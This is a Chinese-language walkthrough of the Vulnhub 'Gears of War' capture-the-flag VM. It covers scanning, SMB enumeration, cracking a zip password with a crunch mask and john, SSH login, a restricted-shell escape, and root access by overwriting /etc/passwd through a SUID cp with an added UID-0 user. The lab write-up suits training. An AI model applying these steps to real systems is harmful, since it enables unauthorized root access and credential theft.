Vulnhub之Gears of War靶机详细测试过程

Gear of War

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:a1:99:30      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:25:35:76      1      60  PCS Systemtechnik GmbH         

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 22:11 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.000094s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09038d1ff8c9d4b443b3c37312ba95e1 (RSA)
|   256 1ba05f3ea26b225a81c3187e5bfcd2bd (ECDSA)
|_  256 181f0cd6e72af55c45cb8d7970314b7a (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: LOCUST)
MAC Address: 08:00:27:25:35:76 (Oracle VirtualBox virtual NIC)
Service Info: Host: GEARS_OF_WAR; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb2-time: 
|   date: 2023-05-01T02:11:52
|_  start_date: N/A
|_nbstat: NetBIOS name: GEARS_OF_WAR, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: gears_of_war
|   NetBIOS computer name: GEARS_OF_WAR\x00
|   Domain name: \x00
|   FQDN: gears_of_war
|_  System time: 2023-05-01T02:11:52+00:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ smbclient -L 192.168.56.254                                
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        LOCUS_LAN$      Disk      LOCUST FATHER
        IPC$            IPC       IPC Service (gears_of_war server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        LOCUST               GEARS_OF_WAR
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ smbclient //192.168.56.254/LOCUS_LAN$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Oct 17 14:06:58 2019
  ..                                  D        0  Thu Oct 17 09:51:38 2019
  msg_horda.zip                       N      332  Thu Oct 17 10:53:33 2019
  SOS.txt                             N      198  Thu Oct 17 14:06:58 2019

                5190756 blocks of size 1024. 2014200 blocks available
smb: \> get SOS.txt 
getting file \SOS.txt of size 198 as SOS.txt (96.7 KiloBytes/sec) (average 96.7 KiloBytes/sec)
smb: \> get msg_horda.zip 
getting file \msg_horda.zip of size 332 as msg_horda.zip (162.1 KiloBytes/sec) (average 129.4 KiloBytes/sec)
smb: \> pwd
Current directory is \\192.168.56.254\LOCUS_LAN$\
smb: \> put test.txt 
NT_STATUS_ACCESS_DENIED opening remote file \test.txt
smb: \> quit

  1. smb服务不允许上传文件

  2. 将共享目录的文件下载到Kali Linux到本地

─(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ enum4linux 192.168.56.254
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                   
                                                                                                                              
S-1-22-1-1000 Unix User\marcus (Local User)          

利用enum4linux工具识别目标主机存在marcus用户

┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ cat SOS.txt                                                             
This is a message for the Delta Team.

I found a file that contains a password to free ........ oh no they here!!!!!!!!!!,
i must protect myself, please try to get the password!!

[@%%,]

-Hoffman.

┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ unzip msg_horda.zip 
Archive:  msg_horda.zip
[msg_horda.zip] key.txt password:                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ zip2john msg_horda.zip > hash 
ver 2.0 efh 5455 efh 7875 msg_horda.zip/key.txt PKZIP Encr: TS_chk, cmplen=152, decmplen=216, crc=37552E74 ts=7635 cs=7635 type=8
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash       
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-04-30 22:15) 0g/s 9313Kp/s 9313Kc/s 9313KC/s !LUVDKR!..*7¡Vamos!
Session completed. 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash --force
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-04-30 22:16) 0g/s 13280Kp/s 13280Kc/s 13280KC/s !LUVDKR!..*7¡Vamos!
Session completed. 

john没有破解出来。

SOS.txt文件中的[@%%,],是密码的表达式吗?可用crunch产生字典

┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ crunch 4 4 -t @%%, > dict
Crunch will now generate the following amount of data: 338000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 67600 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ wc -l dict                            
67600 dict

这样就根据作者提示的表达式创建了字典,然后用该字典去破解压缩文件的密码。

──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ john --wordlist=dict hash                             
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
r44M             (msg_horda.zip/key.txt)     
1g 0:00:00:00 DONE (2023-04-30 22:40) 16.66g/s 819200p/s 819200c/s 819200C/s r32Y..s90L
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

很快就破解得到了密码。

┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ unzip msg_horda.zip
Archive:  msg_horda.zip
[msg_horda.zip] key.txt password: 
  inflating: key.txt                 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ cat key.txt              
"Vamos a atacar a los humanos con toda nuestras hordas,
por eso puse en prision a el hombre mas peligroso que tenian,
por lo que sin el son debiles."

[[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]]

-General RAAM.

3_d4y应该是某个用户的密码,而前面enum4linxu工具已经扫描出用户名为marcus

┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ ssh marcus@192.168.56.254                                      
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:63GFdRgqF2ztaC4ps1OyfL9ZA7GOoIvatMoxc/cIb78.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
marcus@192.168.56.254's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon May  1 02:43:25 UTC 2023

  System load:  0.0               Processes:             94
  Usage of /:   58.3% of 4.95GB   Users logged in:       0
  Memory usage: 39%               IP address for enp0s3: 192.168.56.254
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

48 packages can be updated.
0 updates are security updates.


Last login: Thu Oct 17 18:38:43 2019
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

marcus@gears_of_war:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
marcus@gears_of_war:~$ sudo -l
[sudo] password for marcus: 
Sorry, user marcus may not run sudo on gears_of_war.
marcus@gears_of_war:~$ ls -alh
total 40K
drwxrwxrwx 6 marcus marcus 4.0K Oct 17  2019 .
drwxr-xr-x 4 root   root   4.0K Oct 17  2019 ..
-rw------- 1 marcus marcus   17 Oct 17  2019 .bash_history
-rwxrwxrwx 1 marcus marcus  220 Apr  4  2018 .bash_logout
-rwxrwxrwx 1 marcus marcus 3.7K Apr  4  2018 .bashrc
drwxrwxrwx 2 marcus marcus 4.0K Oct 16  2019 .cache
drwxrwxrwx 3 marcus marcus 4.0K Oct 16  2019 .gnupg
drwxrwxrwx 2 marcus marcus 4.0K Oct 17  2019 jail
drwxrwxrwx 3 marcus marcus 4.0K Oct 16  2019 .local
-rwxrwxrwx 1 marcus marcus  670 Oct 17  2019 .profile
marcus@gears_of_war:~$ cat .bash_his-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier

cat: .bash_his: No such file or directory
marcus@gears_of_war:~$ cat .bash_history
history 
su root
marcus@gears_of_war:~$ cd jail
-rbash: cd: restricted
marcus@gears_of_war:~$ which nc
/bin/nc

这应该是受限的shell

用-t ‘bash -noprofile'可绕过限制

cp命令有SUID位

提权

利用cp命令的SUID位进行提权,可以创建密码,然后写入/etc/passwd文件中去

┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
└─$ openssl passwd -6 -salt jason 123456                         
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41
                                                                                                  

jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash

内容添加到passwd(可以在/tmp目录下完成),然后利用cp命令覆盖原来的/etc/passwd文件

marcus@gears_of_war:/tmp$ cp passwd /etc/passwd
marcus@gears_of_war:/tmp$ su  - jason
Password: 
root@gears_of_war:~# cd /root
root@gears_of_war:~# ls -alh
total 52K
drwx------  6 root root 4.0K Oct 17  2019 .
drwxr-xr-x 24 root root 4.0K Oct 16  2019 ..
-rw-------  1 root root  216 Oct 17  2019 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Oct 17  2019 .cache
-rw-r--r--  1 root root  13K Oct 17  2019 .flag.txt
drwx------  3 root root 4.0K Oct 17  2019 .gnupg
drwxr-xr-x  3 root root 4.0K Oct 16  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Oct 16  2019 .ssh
root@gears_of_war:~# cat .flag.txt 
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                                                                                                                                                                
                                                                                                                                                               
                                                                                                                                                               
                                                                                                     .,*,,                                                     
                                                                                                  .*(((#((((*,.                                                
                                                                                               ,*/,,,..*/(((/*/#(.                                             
                                                                                            .*//*((####(/,,*,/(#(*                                             
                                                         ..,*//((*,                  ....**/**(##########%#(*,*(#/.                                            
                                                      .*/((#######((*.   ..,*..*,,**///*,,,/(################(//*,.                                            
                                                    .,/(((((((((((####/.. ...,,*,****,,*/#####################*/(,.                                            
                                                   .,/(((/((#(##########(,.,,,,//((/*/(####(##################(///.                                            
                                                   ,*(##(#((((/#######%#(###(##################################/((*                                            
                                                   .*((#/*/(/(#############(#######################(#((#(######*((*                                            
                                                   .*((((#####################################(########((######**/*.                                           
                                                   ,/##((###########################################(##########*,(///.                                         
                                                   *(((###%#####################################################(,****,                                        
                                                 .,/(##(#######%%#####%############(#(############################(***,.                                       
                                              .**(##%##%###(#####((###############%######//,,*/((###################(,...                                      
                                            ./(##((##%#(##(/(((((##########################/*.     *(############%####(,.     .                                
                                           **(####((###((///####%######################%####(*,       ,((###############*                                      
                                         .,//*/((((#((/*,,*##################################((/        ./(#%#####%###%###/*****,.                             
                                      ..*//(/*/#(((/(//*/#####################################(/.         ./#####%#%#################*.                        
                            .,,,*//.**((#(/####(#((((,,(#######################################(*           ./(######################(/                        
                          ,,,/(**((((*///(#(#####(/,../################(#(###(##################(             ,((%##############((((#((.                       
                         .,*///(####(//(((######((.  ,/##################################%######(              .*(####%########(##(####*                       
                        .**/((((##(((*//(/((###((*. ./((####################(###################(               .*(#########(#####(####(                       
                       .,***/(///(((/##(/((####(*  .,*(###########################(##############*.              .*(###%#######/(((##(##,                      
                       ,*//*/((//(####(((((#/((,.  .*##((####################(############(####/(/,,              ./(#######((((#((####(*                      
                        ,/(((((((#(((((//##(((/.   ,*#%#####%#########################/,.  .*##/*((**              ,/################(*                        
                         .*(/((//((/((((((/((//,   */##############################/.        *#((//#(,.             ,(##############/                          
                           ,/((##(((((##(*///*,   .*(#%########(########%########(*          ,(#(//##*               *(##%########(.                           
                            ./((/###(#(((((((//   ./#####%##%###(((#((############/          ./###((((*              ,(###%######(*                            
                             .*###(##(/(#(#((/,    ,/###########(        .(####(###*.     .,/######(*/*              ./###########/                            
                               ,/(##(#######/(,     ,/(###(/##(/.         /##########(##(############((.             ./#########%#(                            
                                 /(###((#####/,      ,*((((####,         ./#####/,((#################(/,             ./###########/                            
                                 /#########((/,        */##(/(#/.        *###, ((   .##############(/(/.             ./##%#######(/                            
                                 (###########(,        .(((#(*//*    .,(((###   (.   *(#(######(#(*..*/,             ,(#(##%####((/                            
                                ./(####(#####/.         ,((##/,(#############*   (,  ,(##(#####(*. ....,.            *(##%##(##((/,                            
                                .*(((##(####%#/        .*((###/(#############(, .(#######(/((##. .  ,. ,,           .(#######(//*//.                           
                                .*/((#(#######(,        ,/#((/((##(##(################(#(##((##(/(. .               *##(######/(/(#/*                          
                               ,/((//((#######(*,        ,*/(//((#############(########(#*,*...,*/  *              ,#######(#/(###(**/,                        
                              ,(####/(#######(((/,         ,*//*/##((#((#(#######,((.,#, *,*.,..,*..(.            .##########(((/////**,.                      
                            .,*(**(#####%#######(*.         ..,*(((**..((((####,,,,#*/*..,,. ,/*/,**/,           ./#%####((##/////////***,                     
                          ..//(/*(################(,,           .**,,/. ./(##/*(.* ...*(.,*,* *((##(/.          ./###%#((((##(/(((**/***,.                     
                          ,**((/((#################//*.           ,/**#* ,((((/*/ , .,.*(.**/((######          *(##((#(######(//*//((/*,.                      
                         *(#(*/(/####(##############((/,             ,(##.  *(#*,*.(*#* .((//##%##(((        ,*(###((((###(######/*,*,.                        
                       ..,*((/#(((##(################((**.            ,####//((###(##/((((#######((/.      .*/(###(((((########*/,**,..                        
                       ...,/#(#//########%#%###########(/**,.          *####################%%#(#(*.      ,((##((((#/(((#%%#((///*,,.                          
                         ..*(##((######%#%###############(//**,         .##################%###/.      .,/(#######(##((//(//**,.                               
                         .,*/(########%#####################((/*,.        *####%#%%%########(/*     .*/((######%%#(////*                                       
                          .,***//((((#####%###################((/**..          ,/######((*.      ,*(####%########(((**.                                        
                           .,**,****/**/**//***####################(/**,*,,... .,**/*..  ..,,,*/((#####%##########(/.                                          
                                   ..,,********,,((####################(#(///******/*///(((###########%#####%###(/.                                            
                               .           ,*******/(###################((#################################(###/,                                              
                                             .,,,/**/##################(#######(#########################((####,                                               
                                                .*/*/#######################################################(#(.                                               
                                                  .//############((((########(#######################((####((/*.                                               
                                       .           ,(##########(((((((###########################((###(((((((*,                                                
                                              .   .((############((((###(*,,*//*///*//(##%############((//**/*,                                                
                                                  .*(######(#(#######(**,              .*(#######((((/(//**,,                                                  
                                           .       ,*/#####((((((##/,  .*.                ./###((((////,.                                                      
                                                   .,.,,//#########*.. .                 ,,  /((/(/*,                                                          
                                     .         .  .    ,../(#####(*/   .    .                  ..                                                              
                                                     * ..  .,/(#*.   .    .                                                                                    
                                                          .,../#,  .    .           .                                                                          
                                               .   .          .#/  .                       .                                                                   
                                                 ..           .#/              .                                                                               
                                                               #/                                                                                              
                                                        .     .(/                                                                                              
                                        .                      /#                                                                                              
                                                            .  ,(.       .             .                                                                       
                                               ..              ,((     .                                                                                       
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               
Congratulation you got out of the jail and finish this Episode#1!
Please share and support me on twitter!
Twitter: @sir809
root@gears_of_war:~# 

热门相关:至尊箭神   战神   惊世毒妃:轻狂大小姐   重生之至尊千金   最强装逼打脸系统